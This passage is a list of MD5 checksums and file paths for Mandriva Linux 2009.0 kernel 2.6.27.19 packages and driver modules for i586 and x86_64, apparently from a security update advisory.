94176fb7c5b229b3c62f0600b1d52fe1 2009.0/i586/kernel-source-2.6.27.19-1mnb-1-1mnb2.i586.rpm
f4cb8d91603fcb6f746582f196b612ab 2009.0/i586/kernel-source-latest-2.6.27.19-1mnb2.i586.rpm
9def1b9894433e468010e8b1b24e92a5 2009.0/i586/kqemu-kernel-2.6.27.19-desktop-1mnb-1.4.0pre1-0.i586.rpm
d50241909089fa30d6cb9a91b48c0816 2009.0/i586/kqemu-kernel-2.6.27.19-desktop586-1mnb-1.4.0pre1-0.i586.rpm
df0f698d480de6d177750140997cbaad 2009.0/i586/kqemu-kernel-2.6.27.19-server-1mnb-1.4.0pre1-0.i586.rpm
9be1b90adfb875259ec590ced18cff2c 2009.0/i586/kqemu-kernel-desktop586-latest-1.4.0pre1-1.20090305.0.i586.rpm
09f82edb6d801f7e1f198e410af911d5 2009.0/i586/kqemu-kernel-desktop-latest-1.4.0pre1-1.20090305.0.i586.rpm
032e27a171f1e9332171c390377f0c4a 2009.0/i586/kqemu-kernel-server-latest-1.4.0pre1-1.20090305.0.i586.rpm
16ee99cb888c288489c625394d00063a 2009.0/i586/lirc-kernel-2.6.27.19-desktop-1mnb-0.8.3-4.1mdv2009.0.i586.rpm
041176aaeabff23175d56872b93d3484 2009.0/i586/lirc-kernel-2.6.27.19-desktop586-1mnb-0.8.3-4.1mdv2009.0.i586.rpm
9513568cac97c26c488c570556126a39 2009.0/i586/lirc-kernel-2.6.27.19-server-1mnb-0.8.3-4.1mdv2009.0.i586.rpm
2503fe78bf9b733f20457619dddfa1fb 2009.0/i586/lirc-kernel-desktop586-latest-0.8.3-1.20090305.4.1mdv2009.0.i586.rpm
7222d26034fd3480941309f89e0b8f97 2009.0/i586/lirc-kernel-desktop-latest-0.8.3-1.20090305.4.1mdv2009.0.i586.rpm
069e2b02020d1d066fd41fc0d786c5bb 2009.0/i586/lirc-kernel-server-latest-0.8.3-1.20090305.4.1mdv2009.0.i586.rpm
bcdec52d839f3f301ca186cee7c5251a 2009.0/i586/lzma-kernel-2.6.27.19-desktop-1mnb-4.43-24mdv2009.0.i586.rpm
624410092a36c6e8d5da31fa25f180de 2009.0/i586/lzma-kernel-2.6.27.19-desktop586-1mnb-4.43-24mdv2009.0.i586.rpm
c0dcc69c679fd7e71585e1ad47e49296 2009.0/i586/lzma-kernel-2.6.27.19-server-1mnb-4.43-24mdv2009.0.i586.rpm
24dccc6927984e3cc5226ea7ef0e4c6e 2009.0/i586/lzma-kernel-desktop586-latest-4.43-1.20090305.24mdv2009.0.i586.rpm
75e7e00da7b6d2de307dc7ba54b8496e 2009.0/i586/lzma-kernel-desktop-latest-4.43-1.20090305.24mdv2009.0.i586.rpm
833ab6a7e7d3698bf97e510ed2559151 2009.0/i586/lzma-kernel-server-latest-4.43-1.20090305.24mdv2009.0.i586.rpm
a225f322f51b2c66553a3d20aa9b84d7 2009.0/i586/madwifi-kernel-2.6.27.19-desktop-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
8757bc3b6c02469827cd3fc4d4ee434a 2009.0/i586/madwifi-kernel-2.6.27.19-desktop586-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
c261089e440f598c75576db44c381bf3 2009.0/i586/madwifi-kernel-2.6.27.19-server-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
6774505946633000fdee6b46b284f966 2009.0/i586/madwifi-kernel-desktop586-latest-0.9.4-1.20090305.3.r3835mdv2009.0.i586.rpm
650b393616d0016978b79280504bb850 2009.0/i586/madwifi-kernel-desktop-latest-0.9.4-1.20090305.3.r3835mdv2009.0.i586.rpm
2647605d19cae74d65dcf871bea24a29 2009.0/i586/madwifi-kernel-server-latest-0.9.4-1.20090305.3.r3835mdv2009.0.i586.rpm
164bff5c827a6c9035079de57c23ad95 2009.0/i586/nvidia173-kernel-2.6.27.19-desktop-1mnb-173.14.12-4mdv2009.0.i586.rpm
6e0bdeebbe9dc2cb43ece0d417aa3717 2009.0/i586/nvidia173-kernel-2.6.27.19-desktop586-1mnb-173.14.12-4mdv2009.0.i586.rpm
db8660249c42d373c74a4d184ae8503c 2009.0/i586/nvidia173-kernel-desktop586-latest-173.14.12-1.20090305.4mdv2009.0.i586.rpm
6379084d1c176074cbb03d63da74a838 2009.0/i586/nvidia173-kernel-desktop-latest-173.14.12-1.20090305.4mdv2009.0.i586.rpm
81cb1ae3ca9eb1936a83875fbadf2d8b 2009.0/i586/nvidia71xx-kernel-2.6.27.19-desktop-1mnb-71.86.06-5mdv2009.0.i586.rpm
511b3bfac9f87e5a2d019b265eb0dbca 2009.0/i586/nvidia71xx-kernel-2.6.27.19-desktop586-1mnb-71.86.06-5mdv2009.0.i586.rpm
d94d07e08ccd73ce799dcd4a552be793 2009.0/i586/nvidia71xx-kernel-2.6.27.19-server-1mnb-71.86.06-5mdv2009.0.i586.rpm
1a7c007d81b7f519f879aa2e8d01e338 2009.0/i586/nvidia71xx-kernel-desktop586-latest-71.86.06-1.20090305.5mdv2009.0.i586.rpm
2af0764dc27da74ab0c371cb0ecdfd83 2009.0/i586/nvidia71xx-kernel-desktop-latest-71.86.06-1.20090305.5mdv2009.0.i586.rpm
9694789bcb36b812d47534e0711b1a45 2009.0/i586/nvidia71xx-kernel-server-latest-71.86.06-1.20090305.5mdv2009.0.i586.rpm
cf03bc258ad23472f420173148558910 2009.0/i586/nvidia96xx-kernel-2.6.27.19-desktop-1mnb-96.43.07-5mdv2009.0.i586.rpm
0b7d715d245cdf944676f6122af8ebd6 2009.0/i586/nvidia96xx-kernel-2.6.27.19-desktop586-1mnb-96.43.07-5mdv2009.0.i586.rpm
b8196eff47518fe28a2e774f51b88532 2009.0/i586/nvidia96xx-kernel-2.6.27.19-server-1mnb-96.43.07-5mdv2009.0.i586.rpm
949c8f30e7008988a867eedfb559b4fb 2009.0/i586/nvidia96xx-kernel-desktop586-latest-96.43.07-1.20090305.5mdv2009.0.i586.rpm
a646243e4b262a6f7fab9dc5fa915e89 2009.0/i586/nvidia96xx-kernel-desktop-latest-96.43.07-1.20090305.5mdv2009.0.i586.rpm
a05ffb2a8f5371bf6d30358aab05698c 2009.0/i586/nvidia96xx-kernel-server-latest-96.43.07-1.20090305.5mdv2009.0.i586.rpm
8906ac0db00332a6700c38f8e8125cd0 2009.0/i586/nvidia-current-kernel-2.6.27.19-desktop-1mnb-177.70-2.3mdv2009.0.i586.rpm
842c7f19ef358c788e58a72ffe23071b 2009.0/i586/nvidia-current-kernel-2.6.27.19-desktop586-1mnb-177.70-2.3mdv2009.0.i586.rpm
4c27d98640d507934d58fa491575daa8 2009.0/i586/nvidia-current-kernel-2.6.27.19-server-1mnb-177.70-2.3mdv2009.0.i586.rpm
2696288a3309bfae68cbb5b9ee9363e0 2009.0/i586/nvidia-current-kernel-desktop586-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
3c1d28fb5632251983cacaec44578d86 2009.0/i586/nvidia-current-kernel-desktop-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
6cf33c3312fd3256dcb14761921eb4ab 2009.0/i586/nvidia-current-kernel-server-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
eacb8ea778af3ff78ef58942eab23105 2009.0/i586/omfs-kernel-2.6.27.19-desktop-1mnb-0.8.0-1mdv2009.0.i586.rpm
107264ee670882f9642532d05029e229 2009.0/i586/omfs-kernel-2.6.27.19-desktop586-1mnb-0.8.0-1mdv2009.0.i586.rpm
b926add1895fbcda6ba32323f8e88718 2009.0/i586/omfs-kernel-2.6.27.19-server-1mnb-0.8.0-1mdv2009.0.i586.rpm
9fbd459e57d8eeeafada18852830058a 2009.0/i586/omfs-kernel-desktop586-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
325424f7a578647dfea9897dd4dccd40 2009.0/i586/omfs-kernel-desktop-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
8da55e50cb708523e212ce2ede9182c4 2009.0/i586/omfs-kernel-server-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
7b60f82b26ca77ca995c19db818135cc 2009.0/i586/omnibook-kernel-2.6.27.19-desktop-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
5dead3be02cc6baf52f020b97c232a75 2009.0/i586/omnibook-kernel-2.6.27.19-desktop586-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
8c097aac6047b51e87889e579f9b891f 2009.0/i586/omnibook-kernel-2.6.27.19-server-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
48b63f06c6142efd0843d9477b60a033 2009.0/i586/omnibook-kernel-desktop586-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
6529176b08f4dfd65fc94cc32367c54c 2009.0/i586/omnibook-kernel-desktop-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
862f88d7d82bef088613231baf0bf113 2009.0/i586/omnibook-kernel-server-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
2b78f1db33766589890f955b3c3e8d90 2009.0/i586/opencbm-kernel-2.6.27.19-desktop-1mnb-0.4.2a-1mdv2008.1.i586.rpm
d6eb3627145b554742753487a699eb71 2009.0/i586/opencbm-kernel-2.6.27.19-desktop586-1mnb-0.4.2a-1mdv2008.1.i586.rpm
5fef6dba8d3e420e11ca46b89299eb96 2009.0/i586/opencbm-kernel-2.6.27.19-server-1mnb-0.4.2a-1mdv2008.1.i586.rpm
eb2cf46481c7d3c5c506dd48f73d13a3 2009.0/i586/opencbm-kernel-desktop586-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
802accbcaf5dbfa054624a825462f4c3 2009.0/i586/opencbm-kernel-desktop-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
e8511deddd2814268b87b11e569cb1af 2009.0/i586/opencbm-kernel-server-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
9f2b095f9ea7fba33c9a92449eceae81 2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-desktop-1mnb-1.5.9-2mdv2009.0.i586.rpm
f1ddfb49495fd5829ecf762a4592ee06 2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-desktop586-1mnb-1.5.9-2mdv2009.0.i586.rpm
c31a76dc6c4720037d7f0a92e1e157aa 2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-server-1mnb-1.5.9-2mdv2009.0.i586.rpm
f24ee14c676a1cd20eea56db6ff9cea7 2009.0/i586/ov51x-jpeg-kernel-desktop586-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
10f4aa4428b68e71a8bd4d5555f78454 2009.0/i586/ov51x-jpeg-kernel-desktop-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
f6c26ba890714e3a9ded62420e130c5a 2009.0/i586/ov51x-jpeg-kernel-server-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
0f67c9befc9efd569cbdd2ccbfd85d93 2009.0/i586/qc-usb-kernel-2.6.27.19-desktop-1mnb-0.6.6-6mdv2009.0.i586.rpm
a81c832fddc48d688213bc82cd9380df 2009.0/i586/qc-usb-kernel-2.6.27.19-desktop586-1mnb-0.6.6-6mdv2009.0.i586.rpm
c8b8bbb68fdfb8d62a4f959337b69060 2009.0/i586/qc-usb-kernel-2.6.27.19-server-1mnb-0.6.6-6mdv2009.0.i586.rpm
b1dd4c309c852d61432f608684417174 2009.0/i586/qc-usb-kernel-desktop586-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
45f7b32bc8ca152e3591b370453903f9 2009.0/i586/qc-usb-kernel-desktop-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
63ab7b8e15acfafec986fc3329fd4ace 2009.0/i586/qc-usb-kernel-server-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
8857d93572e771cf61f74b3e7314847f 2009.0/i586/rt2860-kernel-2.6.27.19-desktop-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
dc1b1f29dcc9c4dbe9fd6eb7784f18e1 2009.0/i586/rt2860-kernel-2.6.27.19-desktop586-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
31ab07fe76c636721d98650788c6636a 2009.0/i586/rt2860-kernel-2.6.27.19-server-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
4cdf540e3c9fb2001e369cc6353c56e6 2009.0/i586/rt2860-kernel-desktop586-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
ebc20fa97dcb178adcc7a6da546c0f63 2009.0/i586/rt2860-kernel-desktop-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
ff9ea4777a7d4052ad2da48d71538220 2009.0/i586/rt2860-kernel-server-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
9734b47a2dec3510e7851d972da5ee88 2009.0/i586/rt2870-kernel-2.6.27.19-desktop-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
e588805d6198a9c1eac96d09b317fd2b 2009.0/i586/rt2870-kernel-2.6.27.19-desktop586-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
167cddba9d97c655184c7d79b9383ca4 2009.0/i586/rt2870-kernel-2.6.27.19-server-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
f5bfe516a51433cfaab9d766ae209430 2009.0/i586/rt2870-kernel-desktop586-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
a7785d9be7e07cc9e5d2f4445bffd822 2009.0/i586/rt2870-kernel-desktop-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
a962d5a5ddb0d5abfbe1fe3e57fb48b1 2009.0/i586/rt2870-kernel-server-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
b1a877d9e8d00b70b59bb80c9680acbe 2009.0/i586/rtl8187se-kernel-2.6.27.19-desktop-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
c048e5315987f26780616cf94c0f4822 2009.0/i586/rtl8187se-kernel-2.6.27.19-desktop586-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
f6eff0adb94357152e3a0852d5379ad3 2009.0/i586/rtl8187se-kernel-2.6.27.19-server-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
a32f1a756d4de813795e599e97d1c2d0 2009.0/i586/rtl8187se-kernel-desktop586-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
2ff2126b46e5f25885d405fa5127111e 2009.0/i586/rtl8187se-kernel-desktop-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
9662cf974be2c1a44c37b6190f3dc5fa 2009.0/i586/rtl8187se-kernel-server-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
f23c60919bb5868d827154d0d124b24b 2009.0/i586/slmodem-kernel-2.6.27.19-desktop-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
f174511adbf4e7d4a28fa93d8bf445df 2009.0/i586/slmodem-kernel-2.6.27.19-desktop586-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
98e226637b496a13a5cc61aa1c32825e 2009.0/i586/slmodem-kernel-2.6.27.19-server-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
2453d695bf412200f05105d19c83295d 2009.0/i586/slmodem-kernel-desktop586-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
81ba97857beb20d566b38b4eb70395f3 2009.0/i586/slmodem-kernel-desktop-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
fde7a43ea7bec1b5bd0ed4ee2d44649a 2009.0/i586/slmodem-kernel-server-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
052bec59e98e44029488c57b69fe60ff 2009.0/i586/squashfs-lzma-kernel-2.6.27.19-desktop-1mnb-3.3-5mdv2009.0.i586.rpm
4c1fa95cc898ba83f6baf0d620edd03b 2009.0/i586/squashfs-lzma-kernel-2.6.27.19-desktop586-1mnb-3.3-5mdv2009.0.i586.rpm
c2fb9bcc23ff1f6f5cc80f141bfcc5b5 2009.0/i586/squashfs-lzma-kernel-2.6.27.19-server-1mnb-3.3-5mdv2009.0.i586.rpm
ffaee2e16f52219fd01aeac53a7b9a28 2009.0/i586/squashfs-lzma-kernel-desktop586-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
875ef4776e87aacc60311cd6348c8e70 2009.0/i586/squashfs-lzma-kernel-desktop-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
7be80c25c340e40ab5806cbb7e2b1c1b 2009.0/i586/squashfs-lzma-kernel-server-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
67d811b775b455cca7646ab96fe19feb 2009.0/i586/tp_smapi-kernel-2.6.27.19-desktop-1mnb-0.37-2mdv2009.0.i586.rpm
dc86190987f5d63dee6a09f6b575cc03 2009.0/i586/tp_smapi-kernel-2.6.27.19-desktop586-1mnb-0.37-2mdv2009.0.i586.rpm
b5541df9b49246ab3a543954776b0c45 2009.0/i586/tp_smapi-kernel-2.6.27.19-server-1mnb-0.37-2mdv2009.0.i586.rpm
08c55424da589b16df3d121444567561 2009.0/i586/tp_smapi-kernel-desktop586-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
42b2b4fcb45a531cf9ac98415df13a75 2009.0/i586/tp_smapi-kernel-desktop-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
25cc601d14b45a48684a637293bce938 2009.0/i586/tp_smapi-kernel-server-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
17fef41a38010861a901930cf4ed8789 2009.0/i586/vboxadd-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
5b4a7708d4886312877f1221ff8b8e6a 2009.0/i586/vboxadd-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
fbb5b5ffd33de16d821f38f860aeaee3 2009.0/i586/vboxadd-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
a74d862b1eab86f4e91750b6a6d17d36 2009.0/i586/vboxadd-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
05cb9e7b2412e33b527a9d8349801d39 2009.0/i586/vboxadd-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
b0b7f400718e23692fad06655ead2d5b 2009.0/i586/vboxadd-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
5f4036eea31ec44aee2c39ce9fd1e019 2009.0/i586/vboxvfs-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
402e81c8f408dd6cf76069163e5005b5 2009.0/i586/vboxvfs-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
d46a98e24e9eade0625ac0ddc824b21e 2009.0/i586/vboxvfs-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
f3cb5d805d8a5787e2ca57f28eb52529 2009.0/i586/vboxvfs-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
e2b5b411390ed737e4fcebbc364b5a4f 2009.0/i586/vboxvfs-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
cbd8cd9d0405eac1939629533ef8fe02 2009.0/i586/vboxvfs-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
34d17ced32a45f67e7f85185c3b2a7bb 2009.0/i586/vhba-kernel-2.6.27.19-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
8cd923691e9c04811a1d2eafa32fa091 2009.0/i586/vhba-kernel-2.6.27.19-desktop586-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
d6b8d565712b513d4e31ce08411c3cc9 2009.0/i586/vhba-kernel-2.6.27.19-server-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
fb6c3b61defffb731bd8143e8ea56efe 2009.0/i586/vhba-kernel-desktop586-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
b2505d5bb99c5889a12e2e089e549669 2009.0/i586/vhba-kernel-desktop-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
1207949eafe27831fdd8695ea118ddfe 2009.0/i586/vhba-kernel-server-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
13af97bb172b5647d388dea63f7afdeb 2009.0/i586/virtualbox-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
242b990d08b0795552e3ded15091ca9a 2009.0/i586/virtualbox-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
4498313356e483be80ae72ba8a06f4aa 2009.0/i586/virtualbox-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
6572f7084ab8fa7ce55dc23137e539eb 2009.0/i586/virtualbox-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
4b5c0c2b8dc899fb686021271ba6361a 2009.0/i586/virtualbox-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
2d3a307b25fe2cef9cd6ea1a459c29d2 2009.0/i586/virtualbox-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
1e54fb41c4c6723108369e9b34233038 2009.0/i586/vpnclient-kernel-2.6.27.19-desktop-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
fe82daedce3d043ad3076c760a6b45e7 2009.0/i586/vpnclient-kernel-2.6.27.19-desktop586-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
872dd1a1024376324b12de05b84b2dfd 2009.0/i586/vpnclient-kernel-2.6.27.19-server-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
98ec90796498ee16c43c2e16d5f52640 2009.0/i586/vpnclient-kernel-desktop586-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm
6fa03085ae3c3e7b7472131f4f6b7254 2009.0/i586/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm
828088821547485bfb7cfc52e05763a3 2009.0/i586/vpnclient-kernel-server-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm
9449cc7da776f4b2a5f72e386f555cbc 2009.0/SRPMS/kernel-2.6.27.19-1mnb2.src.rpm
Mandriva Linux 2009.0/X86_64:
894bbd22254ab616321d49d1aea076fa 2009.0/x86_64/alsa_raoppcm-kernel-2.6.27.19-desktop-1mnb-0.5.1-2mdv2008.0.x86_64.rpm
74930ce0211eeda384c808be63ec5f79 2009.0/x86_64/alsa_raoppcm-kernel-2.6.27.19-server-1mnb-0.5.1-2mdv2008.0.x86_64.rpm
7e2a1ebf562b73c04ce4757b412c56a8 2009.0/x86_64/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20090305.2mdv2008.0.x86_64.rpm
3b475280762025c1a3574fbea1b59cb4 2009.0/x86_64/alsa_raoppcm-kernel-server-latest-0.5.1-1.20090305.2mdv2008.0.x86_64.rpm
9f4560d8f09245216d601f9e8c373e4c 2009.0/x86_64/drm-experimental-kernel-2.6.27.19-desktop-1mnb-2.3.0-2.20080912.1mdv2009.0.x86_64.rpm
5b0be7a7161201a2532b1a63aedc1411 2009.0/x86_64/drm-experimental-kernel-2.6.27.19-server-1mnb-2.3.0-2.20080912.1mdv2009.0.x86_64.rpm
089ce1949d44a3a0e8bb8b55b1325b70 2009.0/x86_64/drm-experimental-kernel-desktop-latest-2.3.0-1.20090305.2.20080912.1mdv2009.0.x86_64.rpm
63e5a0ecff019d45bbc17b60501b386e 2009.0/x86_64/drm-experimental-kernel-server-latest-2.3.0-1.20090305.2.20080912.1mdv2009.0.x86_64.rpm
2b30cf7a48df5d4653a7cdde920e791d 2009.0/x86_64/et131x-kernel-2.6.27.19-desktop-1mnb-1.2.3-7mdv2009.0.x86_64.rpm
189da79c374205e35dc20ec0ba3e42c9 2009.0/x86_64/et131x-kernel-2.6.27.19-server-1mnb-1.2.3-7mdv2009.0.x86_64.rpm
9a35b20eea39c1d4fb984b925a73815e 2009.0/x86_64/et131x-kernel-desktop-latest-1.2.3-1.20090305.7mdv2009.0.x86_64.rpm
0ffb9fa0e7065d3819fc2ea208f51612 2009.0/x86_64/et131x-kernel-server-latest-1.2.3-1.20090305.7mdv2009.0.x86_64.rpm
285dfb40bf341cfab75263a0a7fcfe25 2009.0/x86_64/fglrx-kernel-2.6.27.19-desktop-1mnb-8.522-3mdv2009.0.x86_64.rpm
f7c930d8bfe73d803f8853cfa8fa6664 2009.0/x86_64/fglrx-kernel-2.6.27.19-server-1mnb-8.522-3mdv2009.0.x86_64.rpm
508fbdc9a8d33fc2a70537d2ee108265 2009.0/x86_64/fglrx-kernel-desktop-latest-8.522-1.20090305.3mdv2009.0.x86_64.rpm
008d986d5587823198f705634f699838 2009.0/x86_64/fglrx-kernel-server-latest-8.522-1.20090305.3mdv2009.0.x86_64.rpm
d0a0c02367d6725bd1c1afef0ace5803 2009.0/x86_64/gnbd-kernel-2.6.27.19-desktop-1mnb-2.03.07-2mdv2009.0.x86_64.rpm
5f914760f133a45f6cb78462b51ec15c 2009.0/x86_64/gnbd-kernel-2.6.27.19-server-1mnb-2.03.07-2mdv2009.0.x86_64.rpm
d47d5be77fc4e13bab81f9bfa7916674 2009.0/x86_64/gnbd-kernel-desktop-latest-2.03.07-1.20090305.2mdv2009.0.x86_64.rpm
eb5a4d2cd6c6301b22cd30d93bf1d070 2009.0/x86_64/gnbd-kernel-server-latest-2.03.07-1.20090305.2mdv2009.0.x86_64.rpm
95b0f2a016033c7a5b6984fd1af52d6c 2009.0/x86_64/hsfmodem-kernel-2.6.27.19-desktop-1mnb-7.68.00.13-1.2mdv2009.0.x86_64.rpm
7cf675dcb0d69515989eae1e0227925b 2009.0/x86_64/hsfmodem-kernel-2.6.27.19-server-1mnb-7.68.00.13-1.2mdv2009.0.x86_64.rpm
29f6fca5288e06cc07aba81238f48ec7 2009.0/x86_64/hsfmodem-kernel-desktop-latest-7.68.00.13-1.20090305.1.2mdv2009.0.x86_64.rpm
dc629efcad5b7d2985afe6899760ffb4 2009.0/x86_64/hsfmodem-kernel-server-latest-7.68.00.13-1.20090305.1.2mdv2009.0.x86_64.rpm
fe4f52ad8d1f019a3f2894f0afb16a37 2009.0/x86_64/hso-kernel-2.6.27.19-desktop-1mnb-1.2-2mdv2009.0.x86_64.rpm
6b1a658ea3ef22338123139614188e92 2009.0/x86_64/hso-kernel-2.6.27.19-server-1mnb-1.2-2mdv2009.0.x86_64.rpm
6e370faf7c7a13c5591bd2b640331b3d 2009.0/x86_64/hso-kernel-desktop-latest-1.2-1.20090305.2mdv2009.0.x86_64.rpm
35609a3f616874106433e0dd1bc11d2a 2009.0/x86_64/hso-kernel-server-latest-1.2-1.20090305.2mdv2009.0.x86_64.rpm
dcc4366590864be6f4f7d7c93267f97a 2009.0/x86_64/iscsitarget-kernel-2.6.27.19-desktop-1mnb-0.4.16-4mdv2009.0.x86_64.rpm
3c8202d91d4a3f80d0975bc22c446a47 2009.0/x86_64/iscsitarget-kernel-2.6.27.19-server-1mnb-0.4.16-4mdv2009.0.x86_64.rpm
6f2be2f01bacc6be09ec5c3daf0b43b7 2009.0/x86_64/iscsitarget-kernel-desktop-latest-0.4.16-1.20090305.4mdv2009.0.x86_64.rpm
3073f5b1af7b4526bb2fb7e016dcb894 2009.0/x86_64/iscsitarget-kernel-server-latest-0.4.16-1.20090305.4mdv2009.0.x86_64.rpm
984a7be93cc5771de58f7b092fac9f10 2009.0/x86_64/kernel-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
e70b6dcb75296abb30bc0c9febc2c4f1 2009.0/x86_64/kernel-desktop-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
a0d17087516e9ce07c0f346f8825e60d 2009.0/x86_64/kernel-desktop-devel-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
5d707b68469c5bf48f4ced31f1f503b1 2009.0/x86_64/kernel-desktop-devel-latest-2.6.27.19-1mnb2.x86_64.rpm
69ca32bfd5f7680fc2786358c2739830 2009.0/x86_64/kernel-desktop-latest-2.6.27.19-1mnb2.x86_64.rpm
4af3f33bb4404a4dc0ee83c77a988a42 2009.0/x86_64/kernel-doc-2.6.27.19-1mnb2.x86_64.rpm
2a64d93ca03b4dbc3914e830a3287a9a 2009.0/x86_64/kernel-server-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
7c2d766fc57a49fc582b12254b408644 2009.0/x86_64/kernel-server-devel-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
e2d399d9f913fb1c7db976cc43510f66 2009.0/x86_64/kernel-server-devel-latest-2.6.27.19-1mnb2.x86_64.rpm
36c7fa7b3c2857600f8a279af895aeb5 2009.0/x86_64/kernel-server-latest-2.6.27.19-1mnb2.x86_64.rpm
5be5348d6c58dcdf2496c63d4f237858 2009.0/x86_64/kernel-source-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
1647be8495e0f212287994af9b642e1d 2009.0/x86_64/kernel-source-latest-2.6.27.19-1mnb2.x86_64.rpm
58f0cdd1bad3d94c7fd3147079a65ab0 2009.0/x86_64/kqemu-kernel-2.6.27.19-desktop-1mnb-1.4.0pre1-0.x86_64.rpm
a4a909d49a189c71925cd565df246a67 2009.0/x86_64/kqemu-kernel-2.6.27.19-server-1mnb-1.4.0pre1-0.x86_64.rpm
9c7ed86662c6e2aee405e465a0036617 2009.0/x86_64/kqemu-kernel-desktop-latest-1.4.0pre1-1.20090305.0.x86_64.rpm
9d7aad5843013d766fd92f310fd50b8a 2009.0/x86_64/kqemu-kernel-server-latest-1.4.0pre1-1.20090305.0.x86_64.rpm
62c4de8ce043e91e2b02405cd0c0696d 2009.0/x86_64/lirc-kernel-2.6.27.19-desktop-1mnb-0.8.3-4.1mdv2009.0.x86_64.rpm
